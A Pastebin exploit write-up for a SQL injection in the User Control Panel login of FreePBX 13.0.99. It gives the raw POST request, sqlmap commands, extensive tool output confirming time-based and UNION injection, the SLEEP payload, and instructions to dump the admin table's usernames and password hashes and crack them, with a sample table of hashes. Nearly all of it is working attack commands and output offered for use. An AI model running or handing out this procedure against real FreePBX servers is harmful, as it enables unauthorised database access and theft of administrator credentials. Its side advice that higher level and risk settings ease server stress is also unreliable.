Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: [ SQL Injection]
- # Vendor : FreePBX
- # Date: [2016-10-09]
- # Exploit Author: [αԋɱҽԃ αмєяιcαη] ** Skype: AhmedAmerican_ **
- # Vendor Homepage: [https://www.freepbx.org/]
- # Tested Version: [ FreePBX 13.0.99 ** Other versions may also be affected ** ]
- # This Task Need SQLMAP : https://github.com/sqlmapproject/sqlmap/tarball/master
- Following Vulnerable Detected UPON Manual GET/POST REQUEST FOR HTTP HEADERS
- ---------------------------------------------------------------------------------------------------------------------------------------------------------
- POST /ucp/index.php HTTP/1.1
- Host: http://target ip/ or http://target ip:port/
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
- Accept: application/json, text/javascript, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Referer: http://target ip/ucp/
- Content-Length: 103
- Cookie: lang=en_US; PHPSESSID=igq9g1s6lurkpciojt4dabbu71; __utma=90705823.772463779.1476023139.1476023139.1476023139.1; __utmc=90705823; __utmz=90705823.1476023139.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
- Connection: keep-alive
- token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login
- --------------------------------------------------------------------------------------------------------------------------------------------------------------
- Basically, This release simply infected with SQL INJECTION vulnerability Type: POST. With 3 parameter ( username & password & email ) For User Control Panel **/UCP/**
- Make Sure THE UCP IS AVAILABLE BEFORE YOU START ( EXAMPLE : http://TARGET IP/ucp/ OR http://TARGET IP:PORT/ucp/
- KINDLY BE INFORMED THAT EACH IP NEED A NEW TOKEN IN ORDER TO BYPASS THE DATA POST REQUEST.
- -----------------------------------------------------------------------------------------------------------------------------------------------------------------
- After Installing SQLMAP TOOL ON YOUR ROOT.
- Proof of Concept:
- root@American# cd SQLMAP
- root@American:/SQLMAP# nano 1.txt
- ( and insert into it ) :
- POST /ucp/index.php HTTP/1.1
- Host: http://target ip/ or http://target ip:port/
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
- Accept: application/json, text/javascript, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Referer: http://target ip/ucp/
- Content-Length: 103
- Cookie: lang=en_US; PHPSESSID=igq9g1s6lurkpciojt4dabbu71; __utma=90705823.772463779.1476023139.1476023139.1476023139.1; __utmc=90705823; __utmz=90705823.1476023139.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
- Connection: keep-alive
- token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login
- File Name to Write: 1.txt [ Wrote 13 line ]
- root@American:/SQLMAP# ./sqlmap.py -r 1.txt -p "username,password,email"
- ___
- __H__
- ___ ___["]_____ ___ ___ {1.0.10.19#dev}
- |_ -| . [.] | .'| . |
- |___|_ ["]_|_|_|__,| _|
- |_|V |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and
- federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 20:26:50
- [20:26:50] [INFO] parsing HTTP request from '1.txt'
- [20:26:50] [WARNING] the testable parameter 'username,password,email' you provided is not into the GET
- [20:26:51] [INFO] using '/home/American/sqlmap/output/i had remove target ip/session' as session file
- [20:26:52] [INFO] resuming injection data from session file
- [20:26:52] [WARNING] there is an injection in POST parameter 'username,password,email' but you did not provided it this time
- [20:26:52] [INFO] testing connection to the target url
- [20:26:53] [INFO] testing if the url is stable, wait a few seconds
- [20:26:55] [INFO] url is stable
- [20:33:13] [INFO] testing if POST parameter 'username,password,email' is dynamic
- [20:33:14] [INFO] confirming that POST parameter 'username,password,email' is dynamic
- [20:33:14] [INFO] POST parameter 'username,password,email' is dynamic
- [20:33:14] [INFO] heuristics detected web page charset 'ascii'
- [20:33:14] [WARNING] reflective value(s) found and filtering out
- [20:33:14] [WARNING] heuristic (basic) test shows that POST parameter 'username,password,email' might be injectable
- [20:33:15] [INFO] testing for SQL injection on POST parameter 'username,password,email'
- [20:33:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [20:33:18] [INFO] POST parameter 'username,password,email' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="the")
- [20:33:18] [INFO] heuristics detected web page charset 'CP949'
- [20:33:21] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
- it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
- for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
- [20:33:26] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
- [20:33:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
- [20:33:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
- [20:33:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
- [20:33:27] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
- [20:33:27] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
- [20:33:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
- [20:33:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
- [20:33:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
- [20:33:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
- [20:33:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
- [20:33:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
- [20:33:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
- [20:33:30] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
- [20:33:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
- [20:33:30] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
- [20:33:31] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
- [20:33:31] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
- [20:33:31] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
- [20:33:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
- [20:33:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
- [20:33:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
- [20:33:31] [INFO] testing 'MySQL inline queries'
- [20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
- [20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
- [20:33:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
- [20:33:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
- [20:33:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
- [20:33:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
- [20:33:43] [INFO] POST parameter 'username,password,email' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
- [20:33:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
- [20:33:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- [20:33:44] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
- [20:33:45] [INFO] target URL appears to have 14 columns in query
- [20:33:56] [INFO] POST parameter 'username,password,email' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
- POST parameter 'username,email,password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
- sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
- ---
- Parameter: username,password,email (POST)
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: token=1a543e82edd4d6a276ad0be4f1307822' AND SLEEP(30) -- &username=&password=&email=&quietmode=1&module=User&command=login rememberme=on ]
- ---
- [20:33:59] [INFO] the back-end DBMS is MySQL
- web application technology: Apache
- back-end DBMS: MySQL >= 5.0.12
- [20:33:59] [INFO] fetching database names
- [20:34:00] [INFO] the SQL query used returns 2 entries
- [20:34:00] [INFO] retrieved: information_schema
- [20:34:00] [INFO] retrieved: FreePBX
- available databases [2]:
- [*] FreePBX
- [*] information_schema
- [20:34:00] [INFO] fetched data logged to text files under '/home/American/.sqlmap/output/i had removed target ip'
- [*] shutting down at 20:34:01
- so now we are able to find the database, so you can view the database of FreePBX to see tables of admin for columns username,password and email and then you can dump it.
- etc ( -D FreePBX -T admin -C username,password,email --dump and once you get it let sqlmap to try to crack the password hash or crack the password using any cracking site services )
- or you can run the command directly without saving the post target by the following cmd
- ./sqlmap.py -u "http://ip or ip:port/ucp/" --data="token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login" -p "username,password" --dbs
- you can made --level=3 --risk=3 in case if you want to not stress the server.
- and the result gonna be at the end that :
- +———+———+———————————————+
- | username | password |
- +———+———+———————————————+
- Admin | 9dab701b830129f80a3a40a5280b944a |
- Saqisza | 6sb84d072ba41784289c8fb2098458d0 |
- otherwise POST YOUR OWN INFO WHICH YOU WANNA LOG IN WITH AND WAIT TILL POSTING DONE BY SQLMAP
- [token=27dfb08647231ad0ed08fd2bdab65fe1' AND SLEEP(30) -- username=American password=Letmego@ email=Ahmed.American@rocketmail.com rememberme=on ]
- **************************SEE YOU ALL SOON αԋɱҽԃ αмєяιcαη *******************
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement